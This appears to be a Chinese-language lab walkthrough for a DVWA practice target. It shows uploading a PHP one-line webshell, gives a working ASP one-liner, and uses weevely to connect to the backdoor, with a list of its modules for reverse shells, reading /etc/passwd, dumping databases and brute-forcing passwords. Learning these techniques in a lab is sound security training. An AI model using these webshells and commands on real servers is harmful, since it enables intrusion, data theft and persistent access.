Kali输入firefox命令打开火狐浏览器,输入靶机的IP地址访问网页,默认用户密码,admin password
点击DVMA Security安全级别设置为low,在root目录下生成一个shell.php,文件为php一句话木马 转到File UPload页面然后点击shell.php一句话木马上传 使用位置安全狗对网页根目录路径进行常规扫描,自定义扫描,扫描DVNA-1.9,扫出来PHP一句话木马,就代表成功上传到了目标机器, 回到kali打开终端,使用weevely命令来启动工具 生成weevely后门木马文件(weevely generate 设置密码 路径 ) 再次上传hello2.php 使用命令weevely http://192.168.110.26/hackable/uploads/shell.php roothga 进入到终端界面 按下tab键查看可以利用的weevley模块,在需要的模块前面加上“:” 使用命令:audit_phpconf查看目标靶机服务器PHP的配置文件 使用:file_upload /root/shell.php backdoor.php上传到本地文件到目标服务器上 使用命令:file_check来检查目标站点下文件的状态及参数配置(MD5值,大小,权限等) 下面file_check对应的命令的具体作用为::file_check Md5 文件的md5值、 :file_check size文件大小、 :file_check file判断是文件还是文档、 :file_check exists判断文件是否存在、 :file_check perms文件权限值、 :file_check datetime创建日期
#
存放在一个名为shell的变量,shell的取值为HTTp的POST方式,web服务器对shell取值以后,然后
通过eval()函数执行shell里面的内容
Kali菜刀weevely工具
Asp一句话木马<%execute(request(“pass”))%>
php一句话木马
简单的木马会被软件查杀,也可以写牛逼点的木马,就牛逼了
Weevely常用的模块
system.info //收集系统信息文件
file.rm //删除文件
file.read //读文件
file.upload //上传本地文件
file.check //检查文件的权限和
file.enum //在本地词表的书面枚举远程文件
file.download //下载远程二进制/ ASCII文件到本地SQL
sql.query //执行SQL查询
sql.console //启动SQL控制台
sql.dump //获取SQL数据库转储
sql.summary //获取SQL数据库中的表和列后门
backdoor.tcp //TCP端口后门
backdoor.install //安装后门
backdoor.reverse_tcp //反弹枚举
audit.user_files //在用户家中列举常见的机密文件
audit.user_web_files //列举常见的Web文件
audit.etc_passwd //枚举/etc/passwd查找
find.webdir //查找可写的web目录
find.perm //查找权限可读/写/可执行文件和目录
find.name //按名称查找文件和目录
find.suidsgid //查找SUID / SGID文件和目录暴破
bruteforce.sql //暴力破解单一SQL用户
bruteforce.sql_users //暴力破解SQL密码
bruteforce.ftp // 暴力破解单一FTP用户
bruteforce.ftp_users //暴力破解FTP密码



